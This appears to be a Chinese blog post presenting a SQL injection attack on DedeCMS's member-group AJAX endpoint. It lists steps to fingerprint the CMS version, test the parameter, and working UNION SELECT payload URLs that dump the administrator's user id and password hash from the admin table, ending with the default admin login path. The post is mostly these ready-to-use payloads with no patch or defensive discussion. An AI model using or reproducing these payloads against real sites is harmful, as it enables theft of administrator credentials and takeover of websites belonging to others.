dedecms会员注册注入漏洞 | 熊猫博客
当前位置: 首页 > PHP, 漏洞列表, 编程语言 > 正文

dedecms会员注册注入漏洞

一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)
二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入
三、爆用户:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id
四、爆密码的字段:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`
默认后台:dede/login.php


本文固定链接: http://www.chnpanda.com/365.html | 熊猫博客 | 转载请注明出处,谢谢合作!

本文关键字: ,

dedecms会员注册注入漏洞:等您坐沙发呢!

发表评论

亲,不支持纯字母、符号评论哦~